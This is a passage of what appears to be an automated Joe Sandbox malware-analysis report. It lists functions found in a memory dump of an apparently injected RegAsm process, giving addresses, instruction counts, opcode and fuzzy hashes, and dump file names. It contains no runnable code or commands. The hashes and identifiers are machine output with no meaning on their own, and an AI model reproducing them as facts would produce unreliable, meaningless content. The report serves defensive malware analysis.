                                                        • Instruction ID: d2771c7982216e2fd1e01b5e48bc1b24ffc1e5d63ca92d95074aacf8aab5ac5c
                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                        • Instruction Fuzzy Hash: 8AD0C935292E80CFD62ACB0CC5A4B6533A8BB44B88F8194A0E805CBB62D72CD980CA00
                                                        Function 02E8930B Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                        • Instruction ID: ce55a654e1312d60398b32521b167c827c7cd90f50261a874cae22c293430607
                                                        • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                        • Instruction Fuzzy Hash: EAD01735981AC48FE727DB08C165B607BF4F705B44F855098E08A47BA2C37C9984CB00
                                                        Function 02E3C700 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                        • Instruction ID: 34695b5e402b41536be53f93d01adeafcc5133f6c76f0c239e01b98423709358
                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                        • Instruction Fuzzy Hash: 7FC08C33290648AFC712EF98CD01F427BAAEB98B40F004071F3048B670D631FC60EA94
                                                        Function 02E20310 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                        • Instruction ID: 8d0fff301b19fb6abec24e104bd501ad1a972ec785c9cafc674c8513bc2548bd
                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                        • Instruction Fuzzy Hash: C7D01236140248EFCB01DF41C990D9A772BFBD8B10F109019FD1A076508A31ED62DA90
                                                        Function 02E00750 Relevance: .0, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                        • Instruction ID: d643c8c9c14edcb1bd5b9bf172b2e978840454f94b1141aa792ab75680d3e18c
                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                        • Instruction Fuzzy Hash: 1DC04C757515418FCF15DB19D294F4577E5F744744F1558D0F845CB721E724ED01CA10
                                                        Function 02E44340 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e90ccf685acc514572f06aa346f73e538559d372f6b104214b1ae966930d90c0
                                                        • Instruction ID: de4adcaf939503084f8ac32c93b4e5520659d8dd192d67363810d49fe544446a
                                                        • Opcode Fuzzy Hash: e90ccf685acc514572f06aa346f73e538559d372f6b104214b1ae966930d90c0
                                                        • Instruction Fuzzy Hash: F1900231655810129580B1584885547400597E0301B55D011F5424554D8A148A969761
                                                        Function 02E43090 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c20a71cef5f3b26d2be60ff85e90a4a3b1843d80ad16dae641c839457cf952d
                                                        • Instruction ID: d49b404b698ab321a8aa007503ecf6f270b9fc898c1a566f7a88f493bb0f10a9
                                                        • Opcode Fuzzy Hash: 5c20a71cef5f3b26d2be60ff85e90a4a3b1843d80ad16dae641c839457cf952d
                                                        • Instruction Fuzzy Hash: 9190023129141802D580B15884157070006C7D0601F55D011B5024554E86168AA5AAB1
                                                        Function 02E43010 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 410937c518ad545c44f7ee9d293f4636b6dc3f63adeb885beecbe9afd61fa8a0
                                                        • Instruction ID: bc567db2c3022af479770e5f63a73e95bb4666fbd662f41d997f8176a724ea44
                                                        • Opcode Fuzzy Hash: 410937c518ad545c44f7ee9d293f4636b6dc3f63adeb885beecbe9afd61fa8a0
                                                        • Instruction Fuzzy Hash: 6A90023125185442D580B2584805B0F410587E1202F95D019B9156554DC91589959B21
                                                        Function 02E44650 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 78ff0eed742f67a8f1d43adbab1250376ffe4a119762d3076a31d014bcae793b
                                                        • Instruction ID: 01b9a5d2b1aaac6b69be5efa860ba05c684996f1e3978aee93320a42306f7ad3
                                                        • Opcode Fuzzy Hash: 78ff0eed742f67a8f1d43adbab1250376ffe4a119762d3076a31d014bcae793b
                                                        • Instruction Fuzzy Hash: FA9004717515104345C0F15C4C054077005D7F13013D5D115F5554570DC71CCDD5D77D
                                                        Function 02E42AF0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ef31bdfe98c8289de4665a423c8b944f3ba7fbe7a3d280e9263e6a5c3e929726
                                                        • Instruction ID: 7430fcb87b08cfbe4341acb694939783d7f9395a105ad5e266da872ce763d7c8
                                                        • Opcode Fuzzy Hash: ef31bdfe98c8289de4665a423c8b944f3ba7fbe7a3d280e9263e6a5c3e929726
                                                        • Instruction Fuzzy Hash: AE900235271410020585F558060550B044597D6351395D015F6416590DC62189A59721
                                                        Function 02E42AD0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 03c87d910c27cfc903ab31940036314ac6c06a2b83b004b15d8c71c74cda0963
                                                        • Instruction ID: 251ae9d811fbd17e98c68ace60d38372bf7ce2dde12812c9d567fbb3458e4c4b
                                                        • Opcode Fuzzy Hash: 03c87d910c27cfc903ab31940036314ac6c06a2b83b004b15d8c71c74cda0963
                                                        • Instruction Fuzzy Hash: 55900435371410030545F55C07055070047C7D5351355D031F7015550DD731CDF1D531
                                                        Function 02E42AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 85601311e4df52aae3472a6f292dc9404a401fd8748c742d73346006cf5e3c90
                                                        • Instruction ID: 9226a99326882d6f05220d6886a7153cc563b44e9b0c1c543ec4ce8f0d819eda
                                                        • Opcode Fuzzy Hash: 85601311e4df52aae3472a6f292dc9404a401fd8748c742d73346006cf5e3c90
                                                        • Instruction Fuzzy Hash: 769002B1251550924940F2588405B0B450587E0201B55D016F6054560DC5258991D535
                                                        Function 02E42BE0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 999b584362eedae86022576fc5bf6a7e3cb501c9c165376697208051d0f88926
                                                        • Instruction ID: 7f89cf40f5fca90966a4aaccdec901e99702c161baa042320cdbed0142c798cf
                                                        • Opcode Fuzzy Hash: 999b584362eedae86022576fc5bf6a7e3cb501c9c165376697208051d0f88926
                                                        • Instruction Fuzzy Hash: F190023125545842D580B1584405A47001587D0305F55D011B5064694E96258E95FA61
                                                        Function 02E42BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b754c028f5bc02162c960bcecddbce1212e06c06f6ceb9910cc3c0f090bfb98d
                                                        • Instruction ID: 6a8225363b81528f94c44baaa80ec54551e0ef4de0ad2f8b60bd1d3db92a6604
                                                        • Opcode Fuzzy Hash: b754c028f5bc02162c960bcecddbce1212e06c06f6ceb9910cc3c0f090bfb98d
                                                        • Instruction Fuzzy Hash: 0190023125141802D5C0B158440564B000587D1301F95D015B5025654ECA158B99BBA1
                                                        Function 02E42BA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d27e1eaec89c5cc89dff749fc9ecdc532bcbc73072879d74777e67583e74e056
                                                        • Instruction ID: 668a0f2438036db2999a35f5e676714e01b61c1d947be608baac6fe0c3a96cdb
                                                        • Opcode Fuzzy Hash: d27e1eaec89c5cc89dff749fc9ecdc532bcbc73072879d74777e67583e74e056
                                                        • Instruction Fuzzy Hash: E790023165541802D590B1584415747000587D0301F55D011B5024654E87558B95BAA1
                                                        Function 02E42B80 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8ed7a2f4c6907a1fb72db84c8fc4322b742646cb857956ffeaad699d7ee73c35
                                                        • Instruction ID: dfef6e176e72d3dd00596a3d249745aaf39be23ccf4e579397fb1a22c8eac8c7
                                                        • Opcode Fuzzy Hash: 8ed7a2f4c6907a1fb72db84c8fc4322b742646cb857956ffeaad699d7ee73c35
                                                        • Instruction Fuzzy Hash: A590023125141802D544B1584805687000587D0301F55D011BB024655F966589D1B531
                                                        Function 02E42B60 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01fe5d020653b111c0149e08c15f52a0f577685bda0e8f1cff745fc5aef0acef
                                                        • Instruction ID: b0b60fe4b979c7fea876ed9c60e0ed6054512d1331405820750512e093d1e59e
                                                        • Opcode Fuzzy Hash: 01fe5d020653b111c0149e08c15f52a0f577685bda0e8f1cff745fc5aef0acef
                                                        • Instruction Fuzzy Hash: D8900271252410034545B1584415617400A87E0201B55D021F6014590EC52589D1A525
                                                        Function 02E439B0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9573744eb3010b7056e15a27659a0cd2c3095eaf7577d3a575ddca8bc77483b7
                                                        • Instruction ID: 319e1bc5156fcee079b5a70ddd470e4ed420759a900d335ae467d0ce43267086
                                                        • Opcode Fuzzy Hash: 9573744eb3010b7056e15a27659a0cd2c3095eaf7577d3a575ddca8bc77483b7
                                                        • Instruction Fuzzy Hash: 9090023129546102D590B15C44056174005A7E0201F55D021B5814594E85558995A621
                                                        Function 02E42EE0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dffa53de3971aa450a4acd0c6bcaea02caa64fe64cec90ca1985817460f549da
                                                        • Instruction ID: ce103228e5e62e6ba23f9f178d8e10b663a30249e37ca6b55b17a49742254964
                                                        • Opcode Fuzzy Hash: dffa53de3971aa450a4acd0c6bcaea02caa64fe64cec90ca1985817460f549da
                                                        • Instruction Fuzzy Hash: CB90027125181403D580B5584805607000587D0302F55D011B7064555F8A298D91A535
                                                        Function 02E42EA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9560dc40219eb71a0034cd98d4f380e23db7be6af92f42a2a30f907b755e879f
                                                        • Instruction ID: e61d531392574ed0d2d8621bf5d19c6b8210f28534a3d1cb24d14a869b0ce7b2
                                                        • Opcode Fuzzy Hash: 9560dc40219eb71a0034cd98d4f380e23db7be6af92f42a2a30f907b755e879f
                                                        • Instruction Fuzzy Hash: 8190027125141402D580B1584405747000587D0301F55D011BA064554F86598ED5AA65
                                                        Function 02E42E80 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f32f46fb54fd144336d660922f9ee0bc23f849c9aac5697dc13d217caf11ef43
                                                        • Instruction ID: d941f339b2f2ec6ca148323d7e577ef42cbaf7600c2c7ecfa30174a6d25c261c
                                                        • Opcode Fuzzy Hash: f32f46fb54fd144336d660922f9ee0bc23f849c9aac5697dc13d217caf11ef43
                                                        • Instruction Fuzzy Hash: 7890023165141502D541B1584405617000A87D0241F95D022B6024555FCA258AD2E531
                                                        Function 02E42E30 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a233d19449bbfb2ab79f095fa03dbf2530d551f2378404cd43c36549cc07ce8
                                                        • Instruction ID: 191233b2d9a5ccc6c65ada2601835f5a51542a6e14b3f28ad004fbd6033b7b98
                                                        • Opcode Fuzzy Hash: 0a233d19449bbfb2ab79f095fa03dbf2530d551f2378404cd43c36549cc07ce8
                                                        • Instruction Fuzzy Hash: 3990023135141402D542B15844156070009C7D1345F95D012F6424555E86258A93E532
                                                        Function 02E42FE0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da4e4b4ebe5b72da253a905b196852cdada2e7e6e3dbf26d21486d0a023af180
                                                        • Instruction ID: 5e47d0e5e42e7a50f7101a3bf4f70a386d99cfe6e29186917f1b0404a538d913
                                                        • Opcode Fuzzy Hash: da4e4b4ebe5b72da253a905b196852cdada2e7e6e3dbf26d21486d0a023af180
                                                        • Instruction Fuzzy Hash: 4A900231261C1042D640B5684C15B07000587D0303F55D115B5154554DC91589A19921
                                                        Function 02E42FA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 404aa058fbb16f2ac188136d1b6efcdfb421f867518b1d1640eb5357a5c8e94e
                                                        • Instruction ID: 7e536e8e4aa5e1148e848d9bc47581326236768baf577a73e7924abfc33dbdce
                                                        • Opcode Fuzzy Hash: 404aa058fbb16f2ac188136d1b6efcdfb421f867518b1d1640eb5357a5c8e94e
                                                        • Instruction Fuzzy Hash: A790023125181402D540B1584809747000587D0302F55D011BA164555F8665C9D1A931
                                                        Function 02E42FB0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8c8d938a541ff6e23fc83d08ebc6c7ed182504b5125bec1bd0be20678fd785a7
                                                        • Instruction ID: d422e3f5caf89f05b1719549297e6e9ff10b6ba0039a16d7a9473a9d99e6eba3
                                                        • Opcode Fuzzy Hash: 8c8d938a541ff6e23fc83d08ebc6c7ed182504b5125bec1bd0be20678fd785a7
                                                        • Instruction Fuzzy Hash: B8900231651410424580B16888459074005ABE1211755D121B5998550E855989A59A65
                                                        Function 02E42F90 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9924586cb410b77cb4d6e5b7d7164247e9e057c37468567c2548be834a1c43ab
                                                        • Instruction ID: e568da57d6717bdce0edce83634c564525111abca86b098a12976ea449de6a46
                                                        • Opcode Fuzzy Hash: 9924586cb410b77cb4d6e5b7d7164247e9e057c37468567c2548be834a1c43ab
                                                        • Instruction Fuzzy Hash: E890023125181402D540B158481570B000587D0302F55D011B6164555E86258991A971
                                                        Function 02E42F60 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09f2c1e372bf623eea571df019edcee7da49c5cb86e7cf518eb9279ddc7cd4bd
                                                        • Instruction ID: bbbe96ca5a8cbfe1c83f158b68df5812debe587898ca54ab7e4cfc84f9f6ea79
                                                        • Opcode Fuzzy Hash: 09f2c1e372bf623eea571df019edcee7da49c5cb86e7cf518eb9279ddc7cd4bd
                                                        • Instruction Fuzzy Hash: 6B90047137141043D544F15C44057070045C7F1301F55D013F7154554DC53DCDF1D535
                                                        Function 02E42F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 29b3b979c2a63a5268f9216c34479eec7bfae3b447128ac530cb4d7fed26fd98
                                                        • Instruction ID: 19fcb5596df0f03b289309639773a11e981e8d0d8270c265d24ee16945f0cbe4
                                                        • Opcode Fuzzy Hash: 29b3b979c2a63a5268f9216c34479eec7bfae3b447128ac530cb4d7fed26fd98
                                                        • Instruction Fuzzy Hash: 4890027139141442D540B1584415B070005C7E1301F55D015F6064554E8619CD92A526
                                                        Function 02E42CF0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e38ff84f0523d4d8f9168f5569d81e01d06fff962d4e77ea9dfdf691418a2d48
                                                        • Instruction ID: 0ce0d11cf9db58a868eac8ab5082aa83be5051cb61ee007003177d55234011fd
                                                        • Opcode Fuzzy Hash: e38ff84f0523d4d8f9168f5569d81e01d06fff962d4e77ea9dfdf691418a2d48
                                                        • Instruction Fuzzy Hash: 7B90023125141403D540B1585509707000587D0201F55E411B5424558ED6568991A521
                                                        Function 02E42CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0543569649266c3a4be6734e8f8176e16139fb1d59266ad23d9a53a56aacdc41
                                                        • Instruction ID: 703477492dbee2c7c1ea6a856f81005ef3ab7374a2d206c685de0c4351b28e30
                                                        • Opcode Fuzzy Hash: 0543569649266c3a4be6734e8f8176e16139fb1d59266ad23d9a53a56aacdc41
                                                        • Instruction Fuzzy Hash: 0490023165541402D580B1585419707001587D0201F55E011B5024554EC6598B95AAA1
                                                        Function 02E42CA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 735d7c5da3fdd7f230bd6b9edfe12bc9ba639ee37898a2c7110bbcb298d1c17d
                                                        • Instruction ID: bc0a7c1430f75d23cfdf6efa060319d5c8138e4bdd0a5e3f6b4e5cf5fc3e46a8
                                                        • Opcode Fuzzy Hash: 735d7c5da3fdd7f230bd6b9edfe12bc9ba639ee37898a2c7110bbcb298d1c17d
                                                        • Instruction Fuzzy Hash: 8C90023125141402D540B5985409647000587E0301F55E011BA024555FC66589D1A531
                                                        Function 02E42C60 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f4f2e0b4147e9f8763f5d1877fe30728417b8f89953816f6a4f6f7df12ea51ca
                                                        • Instruction ID: 02a15c00961f5fda098555729f0e054a18bbf507e110a04d3de4643a370ebb79
                                                        • Opcode Fuzzy Hash: f4f2e0b4147e9f8763f5d1877fe30728417b8f89953816f6a4f6f7df12ea51ca
                                                        • Instruction Fuzzy Hash: 6A90023125141842D540B1584405B47000587E0301F55D016B5124654E8615C991B921
                                                        Function 02E42DD0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 45b88ce04ffc758d838e84d8efa99da1179c7a629bcb3a8dac91b4c0d93196d8
                                                        • Instruction ID: e9157259549d49850bea69443f19f03bf1a89e4fa62aa58209c98df435f96940
                                                        • Opcode Fuzzy Hash: 45b88ce04ffc758d838e84d8efa99da1179c7a629bcb3a8dac91b4c0d93196d8
                                                        • Instruction Fuzzy Hash: DB900231292451525985F1584405507400697E0241795D012B6414950D85269996DA21
                                                        Function 02E42DB0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
